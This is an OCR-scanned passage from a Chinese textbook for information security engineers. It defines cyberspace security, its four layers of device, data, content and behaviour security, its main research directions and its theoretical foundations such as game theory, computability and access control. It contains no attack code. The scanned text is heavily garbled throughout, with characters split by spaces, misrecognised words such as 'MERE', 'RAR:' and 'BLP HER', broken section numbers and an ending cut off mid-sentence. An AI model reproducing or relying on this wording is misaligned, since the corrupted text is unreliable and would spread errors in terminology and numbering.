在 信息 化 社会 中 ， 计 算 机 和 网 络 在 军事 、 政 治 、 金 融 、 工 业 、 商 业 、 人 们 的 生活 和 
工作 等 方面 的 应 用 越 来 越 广泛 ， 社 会 对 计算 机 和 网 络 的 依赖 越 来 越 大 ， 如 果 计 算 机 和 网 
络 系统 的 信息 安全 受到 危害 将 导致 社会 的 混乱 并 造成 巨大 损失 。 

因此 ， 信 息 的 获取 、 传 输 、 处 理 及 其 安全 保障 能 力 成 为 一 个 国家 综合 国力 和 经 济 竞 
争 力 的 重要 组 成 部 分 ， 信 息 安全 已 成 为 影响 国家 安全 、 社 会 稳定 和 经 济 发 展 的 决定 性 基 
素 之 一 。 信 息 安全 已 成 为 世人 关注 的 社会 问题 和 信息 科学 与 技术 领域 的 研究 热点 。 

我 国正 处 在 建设 有 中 国 特色 社会 主义 现代 化 强国 的 关键 时 期 ， 必 须 采 取 措 施 确保 我 
国 的 信息 安全 。 

我 国政 府 高 度 重视 信息 安全 。2013 年 底 中 央 成 立 了 网 络 安全 与 信息 化 领导 小 组 , 集 
中 领导 和 规划 我 国 的 信息 化 发 展 和 信息 安全 保障 。 习 近 平 主席 亲自 担任 中 央 网 络 安全 与 
信息 化 领导 小 组 的 组 长 。2014 年 2 月 ， 他 指出 : 没有 网 络 安全 就 没有 国家 安全 ， 没 有 信 
息 化 就 没有 现代 化 。 网 络 安全 和 信息 化 是 事 关 国家 安全 和 国家 发 展 、 事 关 广 大 人 民 和 群众 
工作 生活 的 重大 战略 问题 ， 要 从 国际 国内 大 势 出 发 ， 总 体 布局 ， 统 筹 各 方 ， 创 新 发 展 ， 
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努力 把 我 国 建成 网 络 强国 。 
11.2 网络 空 间 安全 学 科 的 内 涵 


随 着 信息 技术 与 产业 的 发 展 和 广泛 应 用 ， 人 类 社会 进入 了 信息 化 时 代 。 在 信息 化 时 
代 ， 人 们 生活 和 工作 在 物理 世界 、 人 类 社会 和 信息 空间 (Cyberspace) 组 成 的 三 元 世 
界 中 。 

为 了 描述 人 们 生活 和 工作 的 信息 空间 ， 人 们 创造 了 Cyberspace 一 词 。 

早 在 1982 年 ， 加 拿 大 作家 威廉 。 吉 布 森 在 其 短篇 科幻 小 说 《燃烧 的 铬 》 中 创造 了 
“Cyberspace” 一 词 ， 意 指 由 计算 机 创建 的 虚拟 信息 空间 。Cyberspace 在 这 里 强调 电脑 爱 
好 者 在 游戏 机 前 体验 到 交感 幻觉 ， 体 现 了 Cyberspace 不 仅 是 信息 的 聚合 体 ， 也 包含 了 信 
息 对 人 类 思想 和 认 知 的 影响 。 此 后 30 年 ， 随 着 信息 技术 的 快速 发 展 和 网 络 的 广泛 运用 ， 
Cyberspace 这 一 概念 不 断 演化 。2008 E, 美国 第 54 号 总 统 令 对 Cyberspace 进行 了 定义 : 
“Cyberspace 是 信息 环境 中 的 一 个 全 球 域 , 由 独立 且 互 相依 存 的 IT 基础 设施 和 网 络 组 成 ， 
包括 互联 网 、 电 信和 网 、 计 算 机 系统 ， 以 及 风 入 式 处 理 器 和 控制 器 。” 

目前 在 国内 ，Cyberspace 一 词 有 多 种 翻译 ， 信 息 空间 、 网 络 空 间 、 网 电 空 间 、 数 字 
世界 等 。 有 的 甚至 直接 译音 ， 称 为 赛 博 空间 。 

我 们 认为 ，Cyberspace 是 信息 时 代 人 类 赖 以 生存 的 信息 环境 ， 是 所 有 信息 系统 的 集 
合 。 它 以 计算 机 和 网 络 系统 实现 的 信息 化 为 特征 。 因 此 把 Cyberspace 翻译 成 信息 空间 或 
网 络 空间 是 比较 好 的 。 其 中 ， 信 息 空间 突出 了 信息 化 的 特征 和 核心 内 涵 是 信息 ， 网 络 空 
间 突 出 了 网 络 互联 的 特征 。 

从 信息 论 角 度 来 看 ， 系 统 是 载体 ， 信 息 是 内 涵 。 网 络 空间 是 所 有 信息 系统 的 集合 ， 

是 一 种 复杂 巨 系统 。 因 此 ， 网 络 空间 存在 更 加 严峻 的 信息 安全 问题 。 
网 络 空间 安全 的 核心 内 涵 仍 是 信息 安全 。 没 有 信息 安全 ， 就 没有 网 络 空 间 安 全 。 
目前 学 术 界 关 于 网 络 空间 安全 学 科 的 定义 和 内 涵 ， 尚 没有 形成 一 个 统一 的 说 法 。 不 
we 给 出 了 不 同 的 诠释 。 尽 管 这 些 诠释 不 尽 相 同 ， 但 是 其 
主要 内 容 却 是 相同 的 。 

传统 的 信息 安全 强调 信息 〈 数 据 ) 本 身 的 安全 属性 ， 认 为 信息 安全 主要 包含 : 

。 信息 的 秘密 性 : 信息 不 被 未 授权 者 知晓 的 属性 ; 

。 信息 的 完整 性 : 信息 是 正确 的 、 真 实 的 、 未 被 算 改 的 、 完 整 无 缺 的 属性 ; 

。 信息 的 可 用 性 : 信息 可 以 随时 正常 使 用 的 属性 。 

众所周知 ， 能 源 、 材 料 、 信 息 是 支撑 现代 社会 大 厦 的 三 根 支柱 。 在 这 三 根 支柱 中 能 
源 和 材料 是 具体 的 、 物 质 的 ， 而 信息 是 抽象 的 、 逻 辑 的 。 信 息 论 的 基本 知识 告诉 我 们 ， 
信息 是 内 涵 ， 系 统 是 载体 。 信 息 不 能 脱离 它 的 载体 而 孤立 存在 ! 因此 我 们 不 能 脱离 信息 
系统 而 孤立 地 谈论 信息 安全 .而 应 当 从 信息 系统 安全 的 视角 来 审视 和 处 理 信 息 安全 问题 。 
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据 此 ， 从 纵向 来 看 ， 信 息 系统 安全 可 以 划分 为 以 下 四 个 层次 : 设备 安全 ， 数 据 安全 ， 
内 容 安全 ， 行 为 安全 。 其 中 数据 安全 即 是 传统 的 信息 安全 。 
1.1.2.1 设备 安全 

信息 系统 设备 的 安全 是 信息 系统 安全 的 首要 问题 。 这 里 主要 包括 三 个 侧面 : 

。 设备 的 稳定 性 : 设备 在 一 定时 间 内 不 出 故障 的 概率 ; 

。 设备 的 可 靠 性 : 设备 能 在 一 定时 间 内 正常 执行 任务 的 概率 ; 

。 设备 的 可 用 性 : 设备 随时 可 以 正常 使 用 的 概率 。 

信息 系统 的 设备 安全 是 信息 系统 安全 的 物质 基础 ， 如 果 失 去 了 这 个 物质 基础 ， 信 息 
系统 安全 就 变 成 空中 楼 效 。 对 信息 设备 的 任何 损坏 都 将 危害 信息 系统 的 安全 。 例 如 ， 人 
为 破坏 、 火 灾 、 水 灾 、 雷 击 等 都 可 能 导致 信息 系统 设备 的 损坏 。 除 了 硬件 设备 外 ， 软 件 
系统 也 是 一 种 设备 。 也 要 确保 软件 设备 的 安全 。 信息 安全 行业 中 的 一 句 行 话 :“ 信 息 系统 
设备 稳定 可 靠 的 工作 是 第 一 位 的 安全 ”用 通俗 的 语言 精 迟 地 说 明了 信息 系统 设备 安全 的 
基础 作用 。 
11.2.2 ”数据 安全 

采取 措施 确保 数据 免 受 未 授权 的 泄露 、 算 改 和 毁坏 。 

。 数据 的 秘密 性 ， 数据 不 被 未 授权 者 知晓 的 属性 。 

。 数据 的 完整 性 ， 数据 是 正确 的 、 真 实 的、 未 被 算 改 的 、 完 整 无 缺 的 属性 。 

。 数据 的 可 用 性 : 数据 可 以 随时 正常 使 用 的 属性 。 

信息 系统 的 设备 安全 是 信息 系统 安全 的 物质 基础 ， 但 是 仅仅 有 信息 系统 的 设备 安全 
是 远 远 不 够 的 。 即使 计算 机 系统 的 设备 没有 受到 损坏 , 其 数据 安全 也 可 能 已 经 受到 危害 。 
如 机 密 数 据 可 能 泄露 ， 数 据 可 能 被 自 改 。 由 于 危害 数据 安全 的 行为 在 很 多 情况 下 并 不 留 
下 明显 痕迹 ， 因 此 常常 在 数据 安全 已 经 受到 危害 的 情况 下 ， 用 户 还 不 一 定 能 够 发 现 。 因 
此 ， 必 须 在 确保 信息 系统 设备 安全 的 基础 之 上 ， 进 一 步 确保 数据 安全 。 
1.1.2.3 ”内 容 安全 

内 容 安全 是 信息 安全 在 政治 、 法 律 、 道 德 层次 上 的 要 求 。 

。 信息 内 容 在 政治 上 是 健康 的 ; 

。 信息 内 容 符合 国家 的 法 律 法 规 ; 

。 信息 内 容 符合 中 华 民族 优良 的 道德 规范 。 

除 此 之 外 ， 广 义 的 内 容 安全 还 包括 信息 内 容 保密 、 知 识 产权 保护 、 信 息 隐 藏 和 隐私 
保护 等 诸多 方面 。 

数据 是 用 来 表达 某 种 意思 的 ， 因 此 只 确保 数据 不 泄密 和 不 被 算 改 也 还 是 远 远 不 够 
的 。 还 要 确保 数据 所 表达 的 内 容 是 健康 的 、 合 法 的 、 道 德 的 。 如 果 数 据 中 充斥 着 不 健康 
的 、 违 法 的 、 违 背 道 德 的 内 容 ， 即 使 它 是 保密 的 、 未 被 自 改 的 ， 也 不 能 说 是 安全 的 。 因 
为 这 会 危害 国家 安全 、 危 害 社会 稳定 、 和 危害 精 神 文明 。 因 此 ， 必 须 在 确保 信息 系统 设备 
安全 和 数据 安全 的 基础 上 ， 进 一 步 确 保 信 息 内 容 的 安全 。 


i E 


N:e 


信息 安全 工程 师 教程 


1.1.2.4 ”行为 安全 
数据 安全 本 质 上 是 一 种 静态 的 安全 ， 而 行为 安全 是 一 种 动态 安全 。 
。 行为 的 秘密 性 : 行为 的 过 程 和 结果 不 能 危害 数据 的 秘密 性 。 必 要 时 ， 行 为 的 过 程 


和 结果 也 应 是 秘密 的 ; 
。 行为 的 完整 性 : 行为 的 过 程 和 结果 不 能 危害 数据 的 完整 性 ， 行 为 的 过 程 和 结果 是 
预期 的 ; 


。 行为 的 可 控 性 ， 当 行为 的 过 程 出 现 偏离 预期 时 ， 能 够 发 现 、 控 制 或 纠正 。 

信息 系统 的 服务 功能 ， 最 终 是 通过 系统 的 行为 提供 给 用 户 的 。 因 此 ， 只 有 确保 信息 
系统 的 行为 安全 ， 才 能 最 终 确 保 系 统 的 信息 安全 。 行 为 体现 在 过 程 和 结果 之 中 ， 因 此 行 
为 安全 是 一 种 动态 安全 。 在 信息 系统 中 除了 硬件 之 外 ， 还 有 软件 和 数据 。 软 件 在 静态 存 
储 时 也 是 一 种 数据 ， 而 软件 在 运行 时 表现 为 程序 的 执行 序列 。 程 序 的 执行 序列 和 相应 的 
硬件 动作 构成 了 系统 的 行为 。 数据 可 以 影响 程序 的 执行 走向 , 从 而 可 以 影响 系统 的 行为 。 
因此 ， 信 息 系统 的 行为 由 硬件 、 软 件 和 数据 共同 确定 。 所 以 ， 必 须 从 硬件 、 软 件 和 数据 
三 方面 来 确保 系统 的 行为 安全 。 

早 在 20 世纪 70 年 代 美 国 军 方 就 开始 研究 导弹 系统 的 行为 安全 。 行 为 安全 的 概念 符 
合 哲学 上 实践 是 检验 真理 唯一 标准 的 基本 原理 ， 同 时 也 符合 我 国政 府 的 “安全 可 控 ” 的 
信息 安全 策略 。 

为 了 表述 简单 ， 在 不 会 产生 歧义 时 可 以 直接 将 信息 系统 安全 简称 为 信息 安全 。 实 际 
上 ， 在 多 数 情况 下 是 不 会 产生 歧义 的 ， 而 且 大 家 已 经 这 样 称呼 了 。 

综 上 ， 我 们 给 出 网 络 空间 安全 学 科 的 内 涵 : 网 络 空间 安全 学 科 是 研究 信息 获取 、 信 
息 存 储 、 信 息 传输 和 信息 处 理 领 域 中 信息 安全 保障 问题 的 一 门 新 兴学 科 。 

网 络 空间 安全 学 科 是 计算 机 、 电 子 、 通 信 、 数 学 、 物 理 、 生 物 、 管 理 、 法 律 和 教育 
等 学 科 交叉 融合 而 形成 的 一 门 交 叉 学 科 。 它 与 这 些 学 科 既 有 紧密 的 联系 ， 又 有 本 质 的 不 
同 。 网 络 空间 安全 学 科 已 经 形成 了 自己 的 内 涵 、 理 论 、 技 术 和 应 用 ， 并 服务 于 信息 社会 ， 
从 而 构成 一 个 独立 的 学 科 。 

2015 年 6 月 ， 国 务 院 学 位 委员 会 和 教育 部 正式 增设 网 络 空间 安全 一 级 学 科 。 

要 确保 信息 安全 ， 必 须 采 取 措施 ， 必 须 付出 代价 。 这 代价 就 是 资源 ， 时 间 资 源 、 空 
间 资 源 和 数据 资源 。 所 采取 的 安全 措施 主要 包括 法 律 措施 、 教 育 措施 、 管 理 措施 和 技术 
措施 等 。 

确保 信息 安全 是 一 个 系统 工程 ， 必 须 综 合 采取 各 种 措施 才能 奏效 。 一 个 系统 只 有 所 
有 子 系统 都 是 安全 时 才 是 安全 的 ， 只 要 有 一 个 子 系统 不 安全 ， 则 整个 系统 就 不 安全 。 虽 
然 某 种 措施 对 付 某 种 危害 可 能 更 有 效 ， 但 是 没有 一 种 措施 能 全 面 解决 信息 安全 问题 。 特 
别 应 当 强 调 的 是 ， 绝 不 能 忽视 法 律 、 教 育 、 管 理 措施 ， 在 许多 情况 下 它们 的 作用 大 于 技 
术 措 施 。 

确保 信息 安全 的 技术 措施 包括 信息 系统 的 硬件 系统 安全 技术 、 操 作 系统 安全 技术 、 
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数据 库 安全 技术 、 软 件 安全 技术 、 网 络 安全 技术 、 密 码 技术 、 恶 意 软件 防治 技术 、 信 息 
隐藏 技术 、 信 息 设备 可 靠 性 技术 ， 等 等 。 在 这 些 众多 的 技术 措施 中 ， 信 息 系统 的 硬件 系 
统 安全 和 操作 系统 安全 是 信息 系统 安全 的 基础 ， 密 码 和 网 络 安全 等 技术 是 关键 技术 。 而 
且 ， 只 有 从 信息 系统 的 硬件 和 软件 的 底层 做 起 ， 从 整体 上 综合 采取 措施 ， 才 能 比较 有 效 
地 确保 信息 系统 的 安全 。 


113 网络 空 间 安 全 学 科 的 主要 研究 方向 和 研究 内 容 


当前 ， 网 络 空间 安全 学 科 的 主要 研究 方向 有 : 密码 学 ， 网 络 安全 ， 信 息 系 统 安全 ， 
信息 内 容 安 全 和 信息 对 抗 。 可 以 预计 ， 随 着 信息 科学 与 技术 的 发 展 和 应 用 ， 一 定 还 会 产 
生 新 的 研究 方向 ， 网 络 空间 安全 学 科 的 研究 内 容 将 更 加 丰富 。 

下 面 分 别 介绍 五 个 方向 的 研究 内 容 。 
1.1.3.1 ”密码 学 

密码 学 由 密码 编码 学 和 密码 分 析 学 组 成 ， 其 中 密码 编码 学 主要 研究 对 信息 进行 编码 
以 实现 信息 隐蔽 ， 而 密码 分 析 学 主要 研究 通过 密 文 获取 对 应 的 明文 信息 。 其 主要 研究 内 
BA: 

。 对 称 密码 ; 
公 钥 密码 ; 
© Hash 函数 ; 
密码 协议 ; 
新 型 密码 : 生物 密码 、 量 子 密码 等 ; 

。 密 钥 管理 ; 

。 密码 应 用 。 
1.1.3.2 MERE 

网 络 安全 的 基本 思想 是 在 网 络 的 各 个 层次 和 范围 内 采取 防护 措施 ， 以 便 能 对 各 种 网 
络 安 全 威胁 进行 检测 和 发 现 ， 并 采取 相应 的 响应 措施 , 确保 网 络 系统 的 信息 安全 。 其 中 ， 
防护 、 检 测 和 响应 都 需要 基于 一 定 的 安全 策略 和 安全 机 制 其 主要 研究 内 容 有 : 

。 网 络 安全 威胁 ; 

= 通信 安全 ; 

。 协议 安全 ; 

。 网 络 防护 ; 

。 入侵 检 测 ; 

。 入 侵 响应 ; 

。 可 信 网 络 。 
1.1.33 ”信息 系统 安全 

信息 系统 是 信息 的 载体 ， 是 直接 面 对 用 户 的 服务 系统 。 用 户 通过 信息 系统 得 到 信息 
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的 服务 。 信 息 系统 安全 的 特点 是 从 系统 整体 上 考虑 信息 安全 的 威胁 与 防护 。 其 主要 的 研 
RAR: 

。 信息 系统 的 安全 威胁 ; 

。 信息 系统 的 硬件 系统 安全 ; 

。 信息 系统 的 软件 系统 安全 ; 
访问 控制 ; 
可 信 计 算 ; 
信息 系统 安全 等 级 保护 ; 

。 信息 系统 安全 测评 认证 ; 

。 应 用 信息 系统 安全 。 
1134 ”信息 内 容 安全 

信息 内 容 安全 是 信息 安全 在 政治 、 法 律 、 道 德 层次 上 的 要 求 。 我 们 要 求 信息 内 容 是 
安全 的 ， 就 是 要 求 信息 内 容 在 政治 上 是 健康 的 ， 在 法 律 上 是 符合 国家 法 律 法 规 的 ， 在 道 
德 上 是 符合 中 华 民族 优良 的 道德 规范 的 。 

信息 内 容 安全 领域 的 研究 内 容 主要 有 : 

。 信息 内 容 的 获取 ; 

。 信息 内 容 的 分 析 与 识别 ; 

。 信息 内 容 的 管理 和 控制 ; 

。 信息 内 容 安全 的 法 律 保障 。 

目前 学 术 界 对 信息 内 容 安全 的 认识 尚 不 一 致 。 广 义 的 信息 内 容 安全 既 包 括 信息 内 容 
在 政治 、 法 律 和 道德 方面 的 要 求 ， 也 包括 信息 内 容 的 保密 、 知 识 产 权 保 护 、 信 息 隐 藏 、 
隐私 保护 等 诸多 方面 。 
113.5 ”信息 对 抗 

随 着 计算 机 网 络 的 迅速 发 展 和 广泛 应 用 ， 信 息 领 域 的 对 抗 已 从 早期 的 电子 对 抗 发 展 
到 今天 的 信息 对 抗 。 

信息 对 抗 是 为 消 弱 、 破 坏 对 方 电子 信息 设备 和 信息 的 使 用 效能 ， 保 障 己方 电子 信息 
设备 和 信息 正常 发 挥 效能 而 采取 的 综合 技术 措施 ， 其 实质 是 斗争 双方 利用 电磁 波 和 信息 
的 作用 来 争夺 电磁 频谱 和 信息 的 有 效 使 用 和 控制 权 。 其 主要 的 研究 内 容 有 : 

。 通信 对 抗 ; 

。 雷达 对 抗 ; 

。 光电 对 抗 ; 

。 计算 机 网 络 对 抗 。 
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等 学 科 交 叉 融 合 而 形成 的 交叉 学 科 ， 其 理论 基础 和 方法 论 基 础 也 与 这 些 学 科 相 关 ， 在 学 
科 的 形成 和 发 展 过 程 中 又 丰富 和 发 展 了 这 些 理论 基础 和 方法 论 ， 从 而 形成 了 自己 特有 的 
学 科 理 论 基 础 和 方法 论 。 
1.1.4.1 “理论 基础 

(1) 数学 是 一 切 自然 科学 的 理论 基础 ， 当 然 也 是 网 络 空间 安全 学 科 的 理论 基础 。 

现代 密码 可 以 分 为 两 类 : 基于 数学 的 密码 和 基于 非 数学 的 密码 。 但 是 ， 基 于 非 数学 
的 密码 (如 量子 密码 和 DNA 密码 等 ) 正 处 在 发 展 的 初期 ， 尚 没有 得 到 广泛 的 实际 应 用 。 
目前 广泛 应 用 的 密码 仍然 是 基于 数学 的 密码 。 对 于 基于 数学 的 密码 ,密码 学 界 普遍 认为 ; 
设计 一 个 密码 就 是 设计 一 个 数学 函数 ， 而 破译 一 个 密码 就 是 求解 一 个 数学 难题 。 这 就 从 
本 质 上 清晰 地 阐明 了 数学 是 密码 学 的 理论 基础 。 作 为 密码 学 理论 基础 之 一 的 数学 分 支 主 
要 有 人 代数、 数论、 概率 统计 、 组 合 数学 等 。 

协议 是 网 络 的 核心 ， 因 此 协议 安全 是 网 络 安全 的 核心 。 作 为 协议 安全 理论 基础 之 一 
的 数学 主要 有 逻辑 学 等 。 

因为 信息 安全 领域 的 斗争 ， 本 质 上 都 是 攻防 双方 之 间 的 斗争 ， 因 此 博弈 论 便 成 为 网 
络 空间 安全 学 科 的 理论 基础 之 一 。 博 弈 论 (Game Theory) 是 现代 数学 的 一 个 分 支 ， 是 
研究 具有 对 抗 或 竞争 性 质 的 行为 的 理论 与 方法 。 一 般 ， 称 具有 对 抗 或 竞争 性 质 的 行为 为 
博弈 行为 。 在 博弈 行为 中 ， 参 加 对 抗 或 竞争 的 各 方 各 自 具 有 不 同 的 目标 或 利益 ， 并 力图 
选取 对 自己 最 有 利 的 或 最 合理 的 方案 。 博 弈 论 研 究 的 就 是 博弈 行为 中 对 抗 各 方 是 否 存在 
最 合理 的 行为 方案 ， 以 及 如 何 找到 这 个 合理 方案 。 博 弈 论 考虑 对 抗 双方 的 预期 行为 和 实 
际 行为 ， 并 研究 其 优化 策略 。 博 弈 论 的 思想 古 已 有 之 ， 我 国 古代 的 《孙子 兵法 》 不 仅 是 
一 部 军事 著作 ， 而 且 是 最 早 的 一 部 博弈 论 专著 。 博 弈 论 已 经 在 军事 、 体 育 和 商业 等 领域 
得 到 广泛 应 用 。 信 息 安 全 领域 的 斗争 无 一 不 具有 这 种 对 抗 性 或 竞争 性 。 如 ， 网 络 的 攻 与 
防 、 密 码 的 加 密 与 破译 、 病 毒 的 制 毒 与 杀毒 、 信 息 隐藏 与 分 析 、 信 息 对抗 ， 等 等 。 因 为 
信息 安全 领域 的 斗争 ， 本 质 上 都 是 人 与 人 之 间 的 攻防 斗争 ， 因 此 博弈 论 便 成 为 网 络 空间 
安全 学 科 的 理论 基础 之 一 ， 而 且 是 网 络 空间 安全 学 科 所 特有 的 理论 基础 。 遵 循 博弈 论 的 
指导 原则 ， 我 们 将 在 信息 安全 的 斗争 中 ， 避 免 被 动 ， 掌 握 主动 ， 立 于 不 败 之 地 。 

(2) 信息 论 、 控 制 论 和 系统 论 是 现代 科学 的 理论 基础 ， 因 此 也 是 网 络 空间 安全 学 科 
的 理论 基础 。 

信息 论 是 商 农 为 解决 现代 通信 问题 而 创立 的 ; 控制 论 是 维 纳 在 解决 自动 控制 技术 问 
题 中 建立 的 ;系统 论 是 为 了 解决 现代 化 大 科学 工程 项 目的 组 织 管理 问题 而 诞生 的 。 它 们 
本 来 都 是 独立 形成 的 科学 理论 ， 但 它们 相互 之 间 紧 密 联系 ， 互 相 渗 透 ， 在 发 展 中 趋向 综 
合 、 统 一 、 有 形成 统一 学 科 的 趋势 。 这 些 理论 是 网 络 空间 安全 学 科 的 理论 基础 。 

信息 论 莫 定 了 密码 学 的 基础 。 信 息 论 对 信息 源 、 密 钥 、 加 密 和 密码 分 析 进 行 了 数学 
分 析 ， 用 不 确定 性 和 唯一 解 距离 来 度量 密码 体制 的 安全 性 , 阐明 了 密码 体制 、 完 善 保密 、 
纯 密码 、 理 论 保密 和 实际 保密 等 重要 概念 ， 把 密码 置 于 坚实 的 数学 基础 之 上 ， 标 志 着 密 
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码 学 作为 一 门 独立 的 学 科 的 形成 。 因 此 ， 信 息 论 成 为 密码 学 的 重要 的 理论 基础 之 一 。 

信息 论 也 葛 定 了 信息 隐藏 的 基础 。 从 信息 论 角 度 看 ， 信 息 隐 藏 〈 嵌 入 ) 可 以 理解 为 
在 一 个 宽带 信道 (原始 宿主 信号 ) 上 用 扩 频 通信 技术 传输 一 个 窄带 信号 〈 隐 藏 信息 )。 尽 
管 隐藏 信号 具有 一 定 的 能 量 ， 但 分 布 到 信道 中 任意 特征 上 的 能 量 是 难以 检测 的 。 隐 藏 信 
息 的 检测 是 一 个 有 噪 信道 中 弱 信 号 的 检测 问题 。 因 此 ， 信 息 论 构成 了 信息 隐藏 的 理论 
基础 。 

系统 论 是 研究 系统 的 一 般 模式 、 结 构 和 规律 的 科学 。 系统 论 的 核心 思想 是 整体 观念 。 
任何 一 个 系统 都 是 一 个 有 机 的 整体 ， 不 是 各 个 部 件 的 机 械 组 合 和 简单 相 加 。 系 统 的 功能 
是 各 部 件 在 孤立 状态 下 所 不 具有 的 。 系 统 论 的 能 动 性 不 仅 在 于 认识 系统 的 特点 和 规律 ， 
更 重要 地 在 于 利用 这 些 特点 和 规律 去 控制 、 管 理 、 改 造 或 创造 一 个 系统 ， 使 它 的 存在 和 
发 展 符合 人 的 需求 。 

控制 论 是 研究 机 器 、 生 命 社会 中 控制 和 通信 的 一 般 规律 的 科学 。 它 研究 动态 系统 在 
变化 的 环境 条 件 下 如 何 保持 平衡 状态 或 稳定 状态 。 控 制 论 中 把 “控制 ”定义 为 ， 为 了 改 
善 受 控 对 象 的 功能 或 状态 ， 获 得 并 使 用 一 些 信息 ， 以 这 种 信息 为 基础 施加 到 该 对 象 上 的 
作用 。 由 此 可 见 ， 控 制 的 基础 是 信息 ， 信 息 的 传递 是 为 了 控制 ， 任 何 控制 又 都 依赖 于 信 
息 反馈 。 

信息 安全 遵从 “ 木 桶 原理 ”。 这 “ 木 桶 原理 ” 正 是 系统 论 的 思想 在 信息 安全 领域 的 
体现 。 

保护 、 检 测 、 响 应 (PDR) 策略 是 确保 信息 系统 和 网 络 系统 安全 的 基本 策略 。 在 信 
息 系统 和 网 络 系统 中 ， 系 统 的 安全 状态 是 系统 的 平衡 状态 或 稳定 状态 。 恶 意 软件 的 入 侵 
打破 了 这 种 平衡 和 稳定 。 检 测 到 这 种 入 侵 ， 便 获得 了 控制 的 信息 ， 进 而 杀 灭 这 些 恶 意 软 
件 ， 使 系统 恢复 安全 状态 。 

确保 信息 系统 安全 是 一 个 系统 工程 ，“ 只 有 从 信息 系统 的 硬件 和 软件 的 底层 做 起 ， 
从 整体 上 综合 采取 措施 ， 才 能 比较 有 效 地 确保 信息 系统 的 安全 ”。 

以 上 策略 和 观点 已 经 经 过 信息 安全 的 实践 检验 ， 证 明 是 正确 的 ， 是 行 之 有 效 的 。 它 
们 符合 系统 论 和 控制 论 的 基本 原理 。 这 表明 ， 系 统 论 和 控制 论 是 信息 系统 和 网 络 系统 安 
全 的 理论 基础 。 

(3) 网 络 空间 安全 学 科 的 许多 问题 是 计算 安全 问题 ， 因 此 计算 理论 也 是 网 络 空间 安 
全 学 科 的 理论 基础 ， 其 中 包括 可 计算 性 理论 和 计算 复杂 性 理论 等 。 

可 计算 性 理论 是 研究 计算 的 一 般 性 质 的 数学 理论 。 它 通过 建立 计算 的 数学 模型 ， 精 
确 区 分 哪些 问题 是 可 计算 的 ， 哪 些 问 题 是 不 可 计算 的 。 对 于 判定 问题 ， 可 计算 性 理论 研 
究 哪些 问题 是 可 判定 问题 ， 那 些 问题 是 不 可 判定 问题 。 

计算 复杂 性 理论 使 用 数学 方法 对 计算 中 所 需 的 各 种 资源 的 耗费 作 定 量 的 分 析 ， 并 研 
究 各 类 问题 之 间 在 计算 复杂 程度 上 的 相互 关系 和 基本 性 质 。 可 计算 理论 研究 区 分 哪些 是 
可 计算 的 ， 哪 些 是 不 可 计算 的 ， 其 可 计算 是 理论 上 的 可 计算 ， 或 原则 上 的 可 计算 。 而 计 
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算 复 杂 性 理论 则 进一步 研究 现实 的 可 计算 性 ， 如 研究 计算 一 个 问题 类 需要 多 少时 间 ， 多 
少 存储 空间 。 研 究 哪些 问题 是 现实 可 计算 的 ， 哪 些 问题 虽然 是 理论 可 计算 的 ， 但 因 计算 
复杂 性 太 大 而 实际 上 是 无 法 计算 的 。 

众所周知 ， 授 权 是 信息 系统 访问 控制 的 核心 ， 信 息 系 统 是 安全 的 ， 其 授权 系统 必须 
是 安全 的 。 可 计算 性 的 理论 告诉 我 们 : 一 般 意义 上 ， 对 于 给 定 的 授权 系统 是 否 安全 这 一 
问题 是 不 可 判定 问题 ， 但 是 一 些 “ 受 限 ” 的 授权 系统 的 安全 问题 又 是 可 判定 问题 。 由 此 
可 知 ， 一 般 操作 系统 的 安全 问题 是 一 个 不 可 判定 问题 ， 而 具体 的 操作 系统 的 安全 问题 却 
是 可 判定 问题 。 又 例如 ， 著 名 的 “停机 问题 ”是 不 可 判定 问题 ， 而 具体 程序 的 停机 问题 
却 是 可 判定 的 。 由 此 可 知 ， 一 般 计 算 机 病毒 的 检测 是 不 可 判定 问题 ， 而 具体 软件 的 计算 
机 病毒 检测 又 是 可 判定 问题 。 这 就 说 明了 可 计算 理论 是 信息 系统 安全 的 理论 基础 之 一 。 

本 质 上 ， 密 码 破 译 就 是 求解 一 个 数学 难题 ， 如 果 这 个 难题 是 理论 不 可 计算 的 ， 则 这 
个 密码 就 是 理论 上 安全 的 。 如 果 这 个 难题 虽然 是 理论 可 计算 的 ， 但 是 由 于 计算 复杂 性 太 
大 而 实际 上 不 可 计算 ， 则 这 个 密码 就 是 实际 安全 的 ， 或 计算 上 安全 的 。“ 一 次 一 密 ” 密 
码 是 理论 上 安全 的 密码 ， 其 余 的 密码 都 只 能 是 计算 上 安全 的 密码 。 根 据 计 算 复杂 性 理论 
的 研究 ，NP 类 问题 是 困难 的 。NPC 类 问题 是 NP 类 中 最 难 计算 的 一 类 问题 。 公 钥 密 码 
的 构造 往往 基于 一 个 NPC 问题 ， 以 此 期 望 密码 是 计算 上 安全 的 。 如 ，McEliece 密码 基 
于 纠 错 码 的 一 般 译 码 是 NPC 问题 。 背 包 密 码 基于 求解 一 般 背 包 问 题 是 NPC 问题 . MQ 
密码 基于 多 变量 二 次 非 线 性 方程 组 的 求解 问题 是 NPC 问题 ， 等 等 。 这 说 明 计 算 复杂 性 
理论 是 密码 学 的 理论 基础 之 一 。 

(4) 访问 控制 理论 是 网 络 空间 安全 学 科 所 特有 的 的 理论 基础 。 

访问 控制 是 信息 系统 安全 的 核心 问题 。 访 问 控制 的 本 质 是 ， 人 允许 授权 者 执行 某 种 操 
作 获 得 某 种 资源 ， 不 允许 非 授权 者 执行 某 种 操作 获得 某 种 资源 。 许 多 信息 安全 技术 都 可 
看 成 是 访问 控制 。 例 如 ， 信 息 系统 中 的 身份 认证 是 最 基本 的 访问 控制 。 密 码 技术 也 可 以 
看 成 是 访问 控制 。 这 是 因为 ， 在 密码 技术 中 密 钥 就 是 权限 ， 拥 有 密 钥 就 可 以 执行 相应 密 
码 操作 获得 信息 。 没 有 密 钥 ， 就 不 能 执行 相应 密码 操作 不 能 获得 信息 。 同 样 ， 信 息 隐 藏 
技术 也 可 以 看 成 是 访问 控制 。 这 是 因为 ， 在 信息 隐藏 中 隐藏 的 技术 与 方法 就 是 权限 ， 知 
道 了 隐藏 的 技术 与 方法 ， 就 能 获得 隐藏 的 信息 。 不 知道 隐藏 的 技术 与 方法 ， 就 不 能 获得 
隐藏 的 信息 。 

访问 控制 理论 包括 各 种 访问 控制 模型 与 授权 理论 。 例如, 矩阵 模型 .BLP HER, BIBA 
模型 、 中 国 墙 模型 、 基 于 角色 的 模型 (RBAC) 、 属 性 加 密 ， 等 等 。 其 中 属性 加 密 是 密 
码 技术 与 访问 控制 结合 的 新 型 访问 控制 。 

访问 控制 是 信息 安全 领域 的 一 种 共性 关键 技术 ， 许 多 信息 安全 领域 都 要 应 用 访问 控 
